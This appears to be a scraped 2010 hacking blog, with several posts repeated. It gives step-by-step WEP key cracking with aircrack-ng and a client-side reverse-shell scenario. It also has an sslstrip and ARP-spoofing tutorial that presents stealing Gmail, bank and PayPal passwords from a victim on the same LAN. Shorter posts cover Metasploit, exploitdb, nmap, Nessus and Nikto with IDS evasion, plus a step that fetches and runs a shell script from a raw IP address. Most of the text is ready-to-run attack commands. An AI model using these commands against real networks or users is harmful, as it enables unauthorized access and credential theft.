NX Client is a remote deskto client/server - runs natively over ssh
It is used for encrypted remote administration sessions and remote desktop - can replace VLC
platforms : Windows, Linux, Unix
Friday, March 26, 2010
Saturday, February 13, 2010
WEP Crack no wireless clients
There are many times when a wireless network has no wireless clients associated with it and there are no ARP requests coming from the wired side. This tutorial describes how to crack the WEP key when there are no wireless clients and there are no ARP requests coming from the wired side.
If there ARP requests being broadcast from the wire side, then the standard fake authentication combined with ARP request replay technique may be used.
If there ARP requests being broadcast from the wire side, then the standard fake authentication combined with ARP request replay technique may be used.
In this tutorial, here is what was used:
Wireless adaptor Alfa AWUS036H
Backtrack 4
Step 1 - Start the wireless interface in monitor mode on AP channel
airmon-ng start wlan1 9
Step 2 - Use aireplay-ng to do a fake authentication with the access point
aireplay-ng -1 0 -e teddy -a 00:14:6C:7E:40:80 -h 00:09:5B:EC:EE:F2 wlan1
-1 means fake authentication
0 reassociation timing in seconds
Or another variation for picky access points:
aireplay-ng -1 6000 -o 1 -q 10 -e teddy -a 00:14:6C:7E:40:80 -h 00:09:5B:EC:EE:F2 wlan1
6000 - Reauthenticate very 6000 seconds. The long period also causes keep alive packets to be sent
-o 1 - Send only one set of packets at a time. Default is multiple and this confuses some APs
-q 10 - Send keep alive packets every 10 seconds.
Troubleshooting Tips
Some access points are configured to only allow selected MAC addresses to associate and connect. If this is the case, you will not be able to successfully do fake authentication unless you know one of the MAC addresses on the allowed list.
If at any time you wish to confirm you are properly associated is to use tcpdump and look at the packets. Start another session and?
tcpdump -n -e -s0 -vvv -i wlan1
Here is a typical tcpdump error message you are looking for:
11:04:34.360700 314us BSSID:00:14:6c:7e:40:80 DA:00:09:5B:EC:EE:F2 SA:00:14:6c:7e:40:80 DeAuthentication: Class 3 frame received from nonassociated station
Notice that the access point (00:14:6c:7e:40:80) is telling the source (00:09:5B:EC:EE:F2) you are not associated. Meaning, the AP will not process or accept the injected packets.
If you want to select only the DeAuth packets with tcpdump then you can use: ?tcpdump -n -e -s0 -vvv -i wlan1 | grep -i DeAuth?. You may need to tweak the phrase ?DeAuth? to pick out the exact packets you want
Step 3 - Use aireplay-ng chopchop or fragmenation attack to obtain PRGA
The objective of the chopchop and fragmentation attacks is to obtain a PRGA (pseudo random generation algorithm) file. This PRGA is not the WEP key and cannot be used to decrypt packets. However, it can be used to create new packets for injection. The creation of new packets will be covered later in the tutorial.
Either chopchop or fragmentation attacks can be to obtain the PRGA bit file. The result is the same so use whichever one works for you.
We will cover the fragmentation technique first. Start another console session and run:
aireplay-ng -5 -b 00:14:6C:7E:40:80 -h 00:09:5B:EC:EE:F2 ath0
-5 means the fragmentation attack
Success! The file ?fragment-0203-180343.xor? can then be used in the next step to generate an arp packet.
If the fragmentation attack was not successful, you can then try the chopchop technique next. Run:
aireplay-ng -4 -h 00:09:5B:EC:EE:F2 -b 00:14:6C:7E:40:80 ath0
-4 means the chopchop attack
Success! The file ?replay_dec-0201-191706.xor? above can then be used in the next step to generate an arp packet.
Helpful Tips
Be sure the packet is 68 or more bytes otherwise you may not have enough PRGA data to subsequently generate a packet. The PRGA captured has to equal or greater then the packet length we want to generate.
At home, to generate some packets to force chopchop to start, ping a nonexistent IP on your network using a wired client. This forces an arp to be broadcast and this will show up in chopchop to be used.
Step 4 - Use packetforge-ng to create an arp packet
In the previous step, we obtained PRGA. It does not matter which attack generated the PRGA, both are equal. This PRGA is stored in the files ending with ?xor?. We can then use this PRGA to generate a packet for injection. We will be generating an arp packet for injection. The objective is to have the access point rebroadcast the injected arp packet. When it rebroadcasts it, a new IV is obtained. All these new IVs will ultimately be used to crack the WEP key.
But first, lets generate the arp packet for injection by entering:
packetforge-ng -0 -a 00:14:6C:7E:40:80 -h 00:09:5B:EC:EE:F2 -k 255.255.255.255 -l 255.255.255.255 -y fragment-0203-180343.xor -w arp-request
-0 means generate an arp packet
-k 255.255.255.255 is the destination IP (most APs respond to 255.255.255.255)
-l 255.255.255.255 is the source IP (most APs respond to 255.255.255.255)
-y fragment-0203-180343.xor is file to read the PRGA from
-w arp-request is name of file to write the arp packet to
The system will respond:
Wrote packet to: arp-request
Step 5 - Start airodump-ng
Open another console session to capture the generated IVs. Then enter:
airodump-ng -c 9 --bssid 00:14:6C:7E:40:80 -w capture ath0
-c 9 is the channel for the wireless network
Step 6 - Inject the arp packet
Using the console session where you generated the arp packet, enter:
aireplay-ng -2 -r arp-request ath0
-2 means use interactive frame selection
-r arp-request defines the file name from which to read the arp packet
Step 7 - Run aircrack-ng to obtain the WEP key
Start another console session and enter:
aircrack-ng -b 00:14:6C:7E:40:80 capture*.cap
capture*.cap selects all dump files starting with ?capture? and ending in ?cap?.
-b 00:14:6C:7E:40:80 selects the one access point we are interested in
You can run this while generating packets. In a short time, the WEP key will be calculated and presented. Using the PTW method, 40-bit WEP can be cracked with as few as 20,000 data packets and 104-bit WEP with 40,000 data packets. As a reminder, the requirement is that you capture the full packet with airodump-ng. Meaning, do not use the ?--ivs? option.
Backtrack 4
Step 1 - Start the wireless interface in monitor mode on AP channel
airmon-ng start wlan1 9
Step 2 - Use aireplay-ng to do a fake authentication with the access point
aireplay-ng -1 0 -e teddy -a 00:14:6C:7E:40:80 -h 00:09:5B:EC:EE:F2 wlan1
-1 means fake authentication
0 reassociation timing in seconds
Or another variation for picky access points:
aireplay-ng -1 6000 -o 1 -q 10 -e teddy -a 00:14:6C:7E:40:80 -h 00:09:5B:EC:EE:F2 wlan1
6000 - Reauthenticate very 6000 seconds. The long period also causes keep alive packets to be sent
-o 1 - Send only one set of packets at a time. Default is multiple and this confuses some APs
-q 10 - Send keep alive packets every 10 seconds.
Troubleshooting Tips
Some access points are configured to only allow selected MAC addresses to associate and connect. If this is the case, you will not be able to successfully do fake authentication unless you know one of the MAC addresses on the allowed list.
If at any time you wish to confirm you are properly associated is to use tcpdump and look at the packets. Start another session and?
tcpdump -n -e -s0 -vvv -i wlan1
Here is a typical tcpdump error message you are looking for:
11:04:34.360700 314us BSSID:00:14:6c:7e:40:80 DA:00:09:5B:EC:EE:F2 SA:00:14:6c:7e:40:80 DeAuthentication: Class 3 frame received from nonassociated station
Notice that the access point (00:14:6c:7e:40:80) is telling the source (00:09:5B:EC:EE:F2) you are not associated. Meaning, the AP will not process or accept the injected packets.
If you want to select only the DeAuth packets with tcpdump then you can use: ?tcpdump -n -e -s0 -vvv -i wlan1 | grep -i DeAuth?. You may need to tweak the phrase ?DeAuth? to pick out the exact packets you want
Step 3 - Use aireplay-ng chopchop or fragmenation attack to obtain PRGA
The objective of the chopchop and fragmentation attacks is to obtain a PRGA (pseudo random generation algorithm) file. This PRGA is not the WEP key and cannot be used to decrypt packets. However, it can be used to create new packets for injection. The creation of new packets will be covered later in the tutorial.
Either chopchop or fragmentation attacks can be to obtain the PRGA bit file. The result is the same so use whichever one works for you.
We will cover the fragmentation technique first. Start another console session and run:
aireplay-ng -5 -b 00:14:6C:7E:40:80 -h 00:09:5B:EC:EE:F2 ath0
-5 means the fragmentation attack
Success! The file ?fragment-0203-180343.xor? can then be used in the next step to generate an arp packet.
If the fragmentation attack was not successful, you can then try the chopchop technique next. Run:
aireplay-ng -4 -h 00:09:5B:EC:EE:F2 -b 00:14:6C:7E:40:80 ath0
-4 means the chopchop attack
Success! The file ?replay_dec-0201-191706.xor? above can then be used in the next step to generate an arp packet.
Helpful Tips
Be sure the packet is 68 or more bytes otherwise you may not have enough PRGA data to subsequently generate a packet. The PRGA captured has to equal or greater then the packet length we want to generate.
At home, to generate some packets to force chopchop to start, ping a nonexistent IP on your network using a wired client. This forces an arp to be broadcast and this will show up in chopchop to be used.
Step 4 - Use packetforge-ng to create an arp packet
In the previous step, we obtained PRGA. It does not matter which attack generated the PRGA, both are equal. This PRGA is stored in the files ending with ?xor?. We can then use this PRGA to generate a packet for injection. We will be generating an arp packet for injection. The objective is to have the access point rebroadcast the injected arp packet. When it rebroadcasts it, a new IV is obtained. All these new IVs will ultimately be used to crack the WEP key.
But first, lets generate the arp packet for injection by entering:
packetforge-ng -0 -a 00:14:6C:7E:40:80 -h 00:09:5B:EC:EE:F2 -k 255.255.255.255 -l 255.255.255.255 -y fragment-0203-180343.xor -w arp-request
-0 means generate an arp packet
-k 255.255.255.255 is the destination IP (most APs respond to 255.255.255.255)
-l 255.255.255.255 is the source IP (most APs respond to 255.255.255.255)
-y fragment-0203-180343.xor is file to read the PRGA from
-w arp-request is name of file to write the arp packet to
The system will respond:
Wrote packet to: arp-request
Step 5 - Start airodump-ng
Open another console session to capture the generated IVs. Then enter:
airodump-ng -c 9 --bssid 00:14:6C:7E:40:80 -w capture ath0
-c 9 is the channel for the wireless network
Step 6 - Inject the arp packet
Using the console session where you generated the arp packet, enter:
aireplay-ng -2 -r arp-request ath0
-2 means use interactive frame selection
-r arp-request defines the file name from which to read the arp packet
Step 7 - Run aircrack-ng to obtain the WEP key
Start another console session and enter:
aircrack-ng -b 00:14:6C:7E:40:80 capture*.cap
capture*.cap selects all dump files starting with ?capture? and ending in ?cap?.
-b 00:14:6C:7E:40:80 selects the one access point we are interested in
You can run this while generating packets. In a short time, the WEP key will be calculated and presented. Using the PTW method, 40-bit WEP can be cracked with as few as 20,000 data packets and 104-bit WEP with 40,000 data packets. As a reminder, the requirement is that you capture the full packet with airodump-ng. Meaning, do not use the ?--ivs? option.
Friday, February 12, 2010
Simple WEP Crack
Overview
To crack the WEP key for an access point, we need to gather lots of initialization vectors (IVs). Normal network traffic does not typically generate these IVs very quickly. Theoretically, if you are patient, you can gather sufficient IVs to crack the WEP key by simply listening to the network traffic and saving them. Since none of us are patient, we use a technique called injection to speed up the process. Injection involves having the access point (AP) resend selected packets over and over very rapidly. This allows us to capture a large number of IVs in a short period of time.
Equipments used
Wifi Adaptor : Alfa AWUS036H (available in ebay)
Software : Backtrack 4 (Free download from backtrack-linux.org)
Wifi Adaptor : Alfa AWUS036H (available in ebay)
Software : Backtrack 4 (Free download from backtrack-linux.org)
Step 1 - Start the wireless interface in monitor mode on AP channel
airmon-ng start wlan1 6
starts wifi interface in channel 6
Step 2 - Test Wireless Device Packet Injection
aireplay-ng -6 -e infosec -a 00:1B:11:24:27:2E wlan1
-9 means injection
-a 00:1B:11:24:27:2E is the access point MAC address
Step 3 - Start airodump-ng to capture the IVs
airodump-ng -c 6 --bssid 00:1B:11:24:27:2E -w output wlan1
Step 4 - Use aireplay-ng to do a fake authentication with the access point
In order for an access point to accept a packet, the source MAC address must already be associated. If the source MAC address you are injecting is not associated then the AP ignores the packet and sends out a “DeAuthentication” packet in cleartext. In this state, no new IVs are created because the AP is ignoring all the injected packets.
aireplay-ng -1 0 -e infosec -a 00:1B:11:24:27:2E -h 00:c0:ca:27:e5:6a wlan1
-1 means fake authentication
0 reassociation timing in seconds
-e infosec is the wireless network name
-a 00:14:6C:7E:40:80 is the access point MAC address
-h 00:0F:B5:88:AC:82 is our card MAC address
OR
aireplay-ng -1 2 -o 1 -q 10 -e infosec -a 00:1B:11:24:27:2E -h 00:c0:ca:27:e5:6a wlan1
2 - Reauthenticate every 2 seconds.
-o 1 - Send only one set of packets at a time. Default is multiple and this confuses some APs.
-q 10 - Send keep alive packets every 10 seconds.
Troubleshooting Tips
Some access points are configured to only allow selected MAC addresses to associate and connect. If this is the case, you will not be able to successfully do fake authentication unless you know one of the MAC addresses on the allowed list. If you suspect this is the problem, use the following command while trying to do fake authentication. Start another session and…
Run: tcpdump -n -vvv -s0 -e -i | grep -i -E ”(RA:|Authentication|ssoc)”
You would then look for error messages.
If at any time you wish to confirm you are properly associated is to use tcpdump and look at the packets. Start another session and…
Run: “tcpdump -n -e -s0 -vvv -i wlan1”
Here is a typical tcpdump error message you are looking for:
11:04:34.360700 314us BSSID:00:14:6c:7e:40:80 DA:00:0F:B5:88:AC:82 SA:00:14:6c:7e:40:80 DeAuthentication: Class 3 frame received from nonassociated station
Notice that the access point (00:14:6c:7e:40:80) is telling the source (00:0F:B5:88:AC:82) you are not associated. Meaning, the AP will not process or accept the injected packets.
If you want to select only the DeAuth packets with tcpdump then you can use: “tcpdump -n -e -s0 -vvv -i wlan1 | grep -i DeAuth”. You may need to tweak the phrase “DeAuth” to pick out the exact packets you want.
Step 5 - Start aireplay-ng in ARP request replay mode
aireplay-ng -3 -b 00:1B:11:24:27:2E -h 00:c0:ca:27:e5:6a wlan1
Step 6 - Run aircrack-ng to obtain the WEP key
aircrack-ng -b 00:1B:11:24:27:2E output*.cap
Wednesday, February 10, 2010
Client side attacks
Client side attack invloves exploiting a weakness in client software such as browser, in order to gain access to a machine.
The victim computer does not have to be routeable or directly accessbile to the attacker. As long as the victim is able to browser to the attacker site, the attack can occur.
Scenario
Victim == Firewall == INTERNET == Attacker
1. The victim browses the attacker's site.
2. Malicious html exploits a browser vulnerability, and executes shellcode.
3. Shellcode is a reverse shell over port 443 to attackers machine.
Client side attacks can come in other forms, such as Microsoft Doc, ppt, xls files which may exploit a vulnerability in ms office. Perhaps one of the nastiest client side bugs was Microsoft GDI heap overflow, which could be triggered by a JPG image file. Sending the vulnerable victim a seemlingly benign JPG would result in code execution on their machine just by viewing (or previesing) the file.
The victim computer does not have to be routeable or directly accessbile to the attacker. As long as the victim is able to browser to the attacker site, the attack can occur.
Scenario
Victim == Firewall == INTERNET == Attacker
1. The victim browses the attacker's site.
2. Malicious html exploits a browser vulnerability, and executes shellcode.
3. Shellcode is a reverse shell over port 443 to attackers machine.
Client side attacks can come in other forms, such as Microsoft Doc, ppt, xls files which may exploit a vulnerability in ms office. Perhaps one of the nastiest client side bugs was Microsoft GDI heap overflow, which could be triggered by a JPG image file. Sending the vulnerable victim a seemlingly benign JPG would result in code execution on their machine just by viewing (or previesing) the file.
Install jDownloader
Before starting, be sure you have installed Sun's java.You can install it via :
You can change your default java via :
Ok, now let's download Jdownloader, download it via :
After download let's make it executable and run it :
$ sudo apt-get install sun-java6-bin sun-java6-jre sun-java6-jdk sun-java6-pluginYou can change your default java via :
$sudo update-java-alternatives -s java-6-sunOk, now let's download Jdownloader, download it via :
$wget -c http://212.117.163.148/jd.shAfter download let's make it executable and run it :
$chmod +x jd.sh$./jd.sh
Monday, February 8, 2010
metasploit basics
msfconsole
The msfconsole is probably the most popular interface to the MSF. It provides an all-on-one centralized console and allows you efficient access to virtually all of the options available in the Metasploit Framework.
Getting Help
Entering 'help' or a '?' at the msf command prompt will display a listing of available commands along with a description of what they are used for.
msf > help
Tab completion
One of the more useful features of msfconsole is tab completion. As with most other shells, entering what you know and pressing "Tab" will present you with list of options available to you or auto-complete the string if there is only one option.
Show command
Entering 'show' at the msfconsole prompt will display every module within Metasploit
There are number of 'show' commands you can use, but the ones you will use most frequently are 'show auxiliary', 'show exploits', and 'show payloads'
Executing 'show auxiliary' will display a listing of all the available auxiliary modules within metasploit. Auxiliary modules include scanners, deniel of service modules, fuzzers, and more.
msf > show auxiliary
'show exploits' will give a listing of all exploits contained in the framework
msf > show exploits
'show payloads' will display all of the different payloads for all platforms available within Metasploit
msf > show payloads
There are a lot of payloads available. Fortunately, when you are in the context of a particular exploit, running 'show payloads' will only display the payloads that are compatible with that particular exploit. For instance, if it is a Windows exploit, you will not be shown the Linux payloads.
msf exploit(ms08_067_netapi) > show payloads
If you have selected a specific module, you can issue the 'show options' command to display which settings are available and/or required for that specific module.
msf exploit(ms08_067_netapi) > show options
If you aren't certain whether an operating system is vulnerable to a particular exploit, run the 'show targets' command from within the context of an exploit module to see which targets are supported.
msf exploit(ms08_067_netapi) > show targets
If you wish the further fine-tune an exploit, you can see more advanced options by running 'show advanced'
msf exploit(ms08_067_netapi) > show advanced
"search" Command
If you have a general idea of what you are looking for you can search for it via 'search '. In the output below, a search is being made for MS Bulletin MS09-011. The search function will locate this string within the module references.
msf > search ms09-001
"info" Command
The 'info' command will provide detailed information about a particular module including all options, targets, and other information.
msf > info dos/windows/smb/ms09_001_write
"use" Command
When you have decided on a particular module to make use of, issue the 'use' command to select it.
msf > use dos/windows/smb/ms09_001_write
msf auxiliary(ms09_001_write) > show options
"connect" Command
By issuing the 'connect' command with an ip address and port number, you can connect to a remote host from within msfconsole the same as you would with netcat or telnet.
msf > connect 192.168.1.1 23
"set" Command
The 'set' command is used to configure the options and settings of the module you are currently working with.
msf auxiliary(ms09_001_write) > set RHOST 192.168.1.1
RHOST => 192.168.1.1
msf auxiliary(ms09_001_write) > show options
A recently added feature in Metasploit is the ability to set an encoder to use at run-time. This is particularly useful in exploit development when you aren't quite certain as to which payload encoding methods will work with an exploit.
msf exploit(ms08_067_netapi) > show encoders
msf exploit(ms08_067_netapi) > set encoder x86/shikata_ga_nai
encoder => x86/shikata_ga_nai
"check" command
There aren't many exploits that support it, but there is also a 'check' option that will check to see if a target is vulnerable to a particular exploit instead of actually exploiting it.
msf exploit(ms04_045_wins) > show options
msf exploit(ms04_045_wins) > check
Check failed: The connection was refused by the remote host (192.168.1.114:42)
Setting Global Variables
In order to save a lot of typing during a pentest, you can set global variables within msfconsole. You can do this with the 'setg' command. Once these have been set, you can use them in as many exploits and auxiliary modules as you like. You can also save them for use the next time your start msfconsole. However, the pitfall is forgetting you have saved globals, so always check your options before you 'run' or 'exploit'. Conversely, you can use the 'unsetg' command to unset a global variable. In the examples that follow, variables are entered in all-caps (ie: LHOST), but Metasploit is case-insensitive so it is not necessary to do so.
msf > setg LHOST 192.168.1.101
msf > setg RHOSTS 192.168.1.0/24
msf > setg RHOST 192.168.1.136
msf > save
"exploit/run" Commands
When launching an exploit, you issue the 'exploit' command whereas if you are using an auxiliary module, the proper usage is 'run' although 'exploit' will work as well.
msf auxiliary(ms09_001_write) > run
"back" Command
Once you have finished working with a particular module, or if you inadvertently select the wrong module, you can issue the 'back' command to move out of the current context. This, however is not required. Just as you can in commercial routers, you can switch modules from within other modules. As a reminder, variables will only carry over if they are set globally
msf auxiliary(ms09_001_write) > back
The msfconsole is probably the most popular interface to the MSF. It provides an all-on-one centralized console and allows you efficient access to virtually all of the options available in the Metasploit Framework.
Getting Help
Entering 'help' or a '?' at the msf command prompt will display a listing of available commands along with a description of what they are used for.
msf > help
Tab completion
One of the more useful features of msfconsole is tab completion. As with most other shells, entering what you know and pressing "Tab" will present you with list of options available to you or auto-complete the string if there is only one option.
Show command
Entering 'show' at the msfconsole prompt will display every module within Metasploit
There are number of 'show' commands you can use, but the ones you will use most frequently are 'show auxiliary', 'show exploits', and 'show payloads'
Executing 'show auxiliary' will display a listing of all the available auxiliary modules within metasploit. Auxiliary modules include scanners, deniel of service modules, fuzzers, and more.
msf > show auxiliary
'show exploits' will give a listing of all exploits contained in the framework
msf > show exploits
'show payloads' will display all of the different payloads for all platforms available within Metasploit
msf > show payloads
There are a lot of payloads available. Fortunately, when you are in the context of a particular exploit, running 'show payloads' will only display the payloads that are compatible with that particular exploit. For instance, if it is a Windows exploit, you will not be shown the Linux payloads.
msf exploit(ms08_067_netapi) > show payloads
If you have selected a specific module, you can issue the 'show options' command to display which settings are available and/or required for that specific module.
msf exploit(ms08_067_netapi) > show options
If you aren't certain whether an operating system is vulnerable to a particular exploit, run the 'show targets' command from within the context of an exploit module to see which targets are supported.
msf exploit(ms08_067_netapi) > show targets
If you wish the further fine-tune an exploit, you can see more advanced options by running 'show advanced'
msf exploit(ms08_067_netapi) > show advanced
"search" Command
If you have a general idea of what you are looking for you can search for it via 'search '. In the output below, a search is being made for MS Bulletin MS09-011. The search function will locate this string within the module references.
msf > search ms09-001
"info" Command
The 'info' command will provide detailed information about a particular module including all options, targets, and other information.
msf > info dos/windows/smb/ms09_001_write
"use" Command
When you have decided on a particular module to make use of, issue the 'use' command to select it.
msf > use dos/windows/smb/ms09_001_write
msf auxiliary(ms09_001_write) > show options
"connect" Command
By issuing the 'connect' command with an ip address and port number, you can connect to a remote host from within msfconsole the same as you would with netcat or telnet.
msf > connect 192.168.1.1 23
"set" Command
The 'set' command is used to configure the options and settings of the module you are currently working with.
msf auxiliary(ms09_001_write) > set RHOST 192.168.1.1
RHOST => 192.168.1.1
msf auxiliary(ms09_001_write) > show options
A recently added feature in Metasploit is the ability to set an encoder to use at run-time. This is particularly useful in exploit development when you aren't quite certain as to which payload encoding methods will work with an exploit.
msf exploit(ms08_067_netapi) > show encoders
msf exploit(ms08_067_netapi) > set encoder x86/shikata_ga_nai
encoder => x86/shikata_ga_nai
"check" command
There aren't many exploits that support it, but there is also a 'check' option that will check to see if a target is vulnerable to a particular exploit instead of actually exploiting it.
msf exploit(ms04_045_wins) > show options
msf exploit(ms04_045_wins) > check
Check failed: The connection was refused by the remote host (192.168.1.114:42)
Setting Global Variables
In order to save a lot of typing during a pentest, you can set global variables within msfconsole. You can do this with the 'setg' command. Once these have been set, you can use them in as many exploits and auxiliary modules as you like. You can also save them for use the next time your start msfconsole. However, the pitfall is forgetting you have saved globals, so always check your options before you 'run' or 'exploit'. Conversely, you can use the 'unsetg' command to unset a global variable. In the examples that follow, variables are entered in all-caps (ie: LHOST), but Metasploit is case-insensitive so it is not necessary to do so.
msf > setg LHOST 192.168.1.101
msf > setg RHOSTS 192.168.1.0/24
msf > setg RHOST 192.168.1.136
msf > save
"exploit/run" Commands
When launching an exploit, you issue the 'exploit' command whereas if you are using an auxiliary module, the proper usage is 'run' although 'exploit' will work as well.
msf auxiliary(ms09_001_write) > run
"back" Command
Once you have finished working with a particular module, or if you inadvertently select the wrong module, you can issue the 'back' command to move out of the current context. This, however is not required. Just as you can in commercial routers, you can switch modules from within other modules. As a reminder, variables will only carry over if they are set globally
msf auxiliary(ms09_001_write) > back
How to decrypt https passwords
Description
This tutorial shows how to hack or decrypt ssl (https) passwords, email accounts, bank accounts and other secure sites use ssl for encryption.
for example, i login to my gmail account, and in explore address bar it shows
https://mail.google.com/mail/?shva=1#
if you type paypal.com, it automatically redirects to https://www.paypal.com/mv
any sites which use https, we can decrypt password using ssl.
Before starting the attack.. follow the 2 steps below
1. download backtrack and burn to a dvd, and boot from dvd, and set the ip address
2. Attacking PC and Victim PC needs to be in same network/LAN. If Victim PC is on 192.168.1.0 range
then the attacking PC also needs to be in 192.168.1.0 range.
Steps to hack email password using sslstrip program
Basically this attack consists of 4 steps.
Step1. Set the attacker machine in IP forwarding mode, so that it can forward all the victims packets to the right address.
#echo 1 > /proc/sys/net/ipv4/ip_forward
Step2. Start arp spoof attack between the victim machine and the gateway, we spoof the arp replies telling the victim machine that MAC address of the gateway is attackers MAC.
#arpspoof -i eth0 -t 192.168.50.5 192.168.50.1
-t is target (victim ip, 192.168.50.5)
192.168.50.1 is the gateway which you want to spoof
To check if arp is running successfully, from client machine ping to clients gateway, 192.168.50.1
and then use command arp -a
you should see attackers and gateway MAC should be same
Step3, Setup ip table rule using which will redirect all http traffic from victim pc to port 1000, which sslstrip is listening
open a new console, and type the following command.
#iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000
Step3, run sslstrip
#sslstrip -w secret
secret is file name that i want to save the results to a log file
from victim PC, open login to email
now use less secret command to read the log file
search for email address and password
if the log file is too long and if you want to search for a particular user id, use the following command
#less secret
#/infosec.tutorials
infosec.tutorials@gmail.com is the email address i used
Below image of gmail account infosec.tutorials@gmail.com, password field i have removed
Sunday, February 7, 2010
Exploitdb navigation
Updating:
This can be done either in the menu -> Backtrack -> Penetration -> ExploitDB -> Update Exploitdb
Looking for ms08-067
root@bt:/pentest/exploits/exploitdb# ./searchsploit ms08-067
Looking for Apache exploits on Windows platform:
root@bt:/pentest/exploits/exploitdb# ./searchsploit apache windows
Looking for Adobe 9.1.2 exploit and copying it to our root directory and renaming it to adobe:
root@bt:/pentest/exploits/exploitdb# ./searchsploit adobe 9.1.2
This can be done either in the menu -> Backtrack -> Penetration -> ExploitDB -> Update Exploitdb
Looking for ms08-067
root@bt:/pentest/exploits/exploitdb# ./searchsploit ms08-067
Looking for Apache exploits on Windows platform:
root@bt:/pentest/exploits/exploitdb# ./searchsploit apache windows
Looking for Adobe 9.1.2 exploit and copying it to our root directory and renaming it to adobe:
root@bt:/pentest/exploits/exploitdb# ./searchsploit adobe 9.1.2
nmap commands
1. Nmap Range of IP addressess:
nmap 192.168.0.1-10
2. Nmap Range of ports:
nmap -p 1-1024 192.168.1.1
3. Nmap service version detection:
nmap -sV 192.168.1.1
4. Nmap OS version detection:
nmap -A 192.168.1.1
5. Nmap external script checks
nmap -sC 192.168.1.1
6. Nmap scan without ping check (sometimes ping is blocked but you still want to scan)
nmap -PN 192.168.1.1
7. Nmap scan only scanning known ports (fast scan)
nmap -F 192.168.1.1
nmap -T Aggressive -sV -0 -v 192.168.1.1
nmap -T Aggressive -sV -P0 192.168.1.1
nmap 192.168.0.1-10
2. Nmap Range of ports:
nmap -p 1-1024 192.168.1.1
3. Nmap service version detection:
nmap -sV 192.168.1.1
4. Nmap OS version detection:
nmap -A 192.168.1.1
5. Nmap external script checks
nmap -sC 192.168.1.1
6. Nmap scan without ping check (sometimes ping is blocked but you still want to scan)
nmap -PN 192.168.1.1
7. Nmap scan only scanning known ports (fast scan)
nmap -F 192.168.1.1
nmap -T Aggressive -sV -0 -v 192.168.1.1
nmap -T Aggressive -sV -P0 192.168.1.1
Accessing an SMB Share With Linux Machines
To see which shares are available on a given host, run:
/usr/bin/smbclient -L host
where 'host' is the name of the machine that you wish to view.
The browse list shows other SMB servers with resources to share on the network
To use the client, run:
/usr/bin/smbclient service
where 'service' is a machine and share name. For example, if you are trying to reach a directory that has been shared as 'public' on a machine called zimmerman, the service would be called \\zimmerman\public. However, due to shell restrictions, you will need to escape the backslashes, so you end up with something like this:
/usr/bin/smbclient \\\\zimmerman\\public mypasswd
where 'mypasswd' is the literal string of your password.
You will get the smbclient prompt:
Server time is Sat Aug 10 15:58:44 1996
Timezone is UTC+10.0
Domain=[WORKGROUP] OS=[Windows NT 3.51] Server=[NT LAN Manager 3.51]
smb: \>
Type 'h' to get help using smbclient:
smb: \> h
/usr/bin/smbclient -L host
where 'host' is the name of the machine that you wish to view.
The browse list shows other SMB servers with resources to share on the network
To use the client, run:
/usr/bin/smbclient service
where 'service' is a machine and share name. For example, if you are trying to reach a directory that has been shared as 'public' on a machine called zimmerman, the service would be called \\zimmerman\public. However, due to shell restrictions, you will need to escape the backslashes, so you end up with something like this:
/usr/bin/smbclient \\\\zimmerman\\public mypasswd
where 'mypasswd' is the literal string of your password.
You will get the smbclient prompt:
Server time is Sat Aug 10 15:58:44 1996
Timezone is UTC+10.0
Domain=[WORKGROUP] OS=[Windows NT 3.51] Server=[NT LAN Manager 3.51]
smb: \>
Type 'h' to get help using smbclient:
smb: \> h
Install Nessus to Back Track
download nessus and follow the steps to install nessus on backtrack
1. install package using the following command
dpkg -i Nessus-4.2.0-ubuntu810_i386.deb
2. add user to nessus
/opt/nessus/sbin/nessus-adduser
3. register in nessus website and obtain a activation key, and activate your installation
4. Start nessus server
/etc/init.d/nessusd start
5. start client web interface
https://127.0.0.1:8834/
1. install package using the following command
dpkg -i Nessus-4.2.0-ubuntu810_i386.deb
2. add user to nessus
/opt/nessus/sbin/nessus-adduser
3. register in nessus website and obtain a activation key, and activate your installation
4. Start nessus server
/etc/init.d/nessusd start
5. start client web interface
https://127.0.0.1:8834/
Nikto Web Scanning
== Basic scanning ==
manual
The most basic Nikto scan requires a simply host to target, since port 80 is assumed if none is specified. The host can either be an Ip or a host name of a machine, and is specified using the -h (-host) option. The following will scan the IP 192.168.01 on TCP port 90
perl nikto.pl -h 192.168.0.1
To check on a different port, specifiy the port number with the -p (-port) option
perl nikto.pl -h 192.168.0.1 -p 443
Host, ports, and protocols may also be specified by using a full URL syntax
perl nikto.pl -h https://192.168.0.1:443/
== Multiple Port Testing ==
Nikto can scan multiple ports in the same scanning session. To test more than one port on the same host, specify the list of ports in the -p option. Ports can be specified as range (ie: 80-90), or as a comma-delimited list, (i.e, 80,88,90)
perl nikto.pl -h 192.168.0.1 -p 80,88,443
== Multiple Host Testing ==
Nikto support scanning multiple hosts in the same session via a text file of host names or IPs. Instead of giving a host name or IP for the -h (-host) option, a file name can be given. A file of hosts must be formatted as one host per line, with the port number(s) at the end of each line. Portss can be seperated from the host and other ports via colon or a comma. If no ports specified, port 80 will be assumed.
Example of a valid hosts file
192.168.1.1:80
https://192.168.2.2:8080
192.168.2.2
nikto.pl 192.168.1.1 -e 1 -Display V
A host file may also be an nmap output in "greppable" format (i.e from the output from -oG)
A file may be passed to Nikto through stdout/stdin using "-" as the filename. for example
nmap -p80 192.168.1.1/24 -oG | nikto.pl -h -
== Using a Proxy ==
If the machine running Nikto only has access to the target host (or update server) via an HTTP proxy, the test still can be performed. Set the proxy variable, then execute Nikto with -u (-useproxy) command. All connections will be relayed through the HTTP proxy specified in the configuration file
perl nikto.pl -h 192.168.1.1 -p 80 -u
== Updating ==
Nikto can be automatically updated assuming you have internet connectivity from the host nikto is installed on. To update to the latest plugins and database, simply run the Nikto command with the -update command
perl nikto.pl -update
== All Options ==
Below are all the nikto command line options and explanations.
-Cgidirs
Scan these CGI directories. Special words "none" or "all" may be used to scan all CGI directories or none, (respectively). A literal value for a CGI directory such as "/cgi-test" may be specified (must include trailing slash). If this option is not specified, all CGI directories listed in config.txt will be tested
-config
Specify an alternative config file to use instead of the config.txt located in the install directory.
-dbcheck
Check the scan database for syntax errors
-Display
Control the output that Nikto shows. Use the reference number or letter to specify the type, multiple maybe used
1. Show redirects
2. Show cookies recieved
3. Show all 200/OK responses
4. Show URLs which require authentication
D. Debug output
V. Verbose Output
-evasion
Specify the LibWhisker IDS evasion technique to use. Use the reference number to specify the type, multiple may be used
1. Random URI encoding (non-URF8)
2. Directory self-reference (/./)
3. Premature URL ending
4. Prepend long random string
5. Fake parameter
6. TAB as request spacer
7. Change the case of the URL
8. Use Windows directory seperator (\)
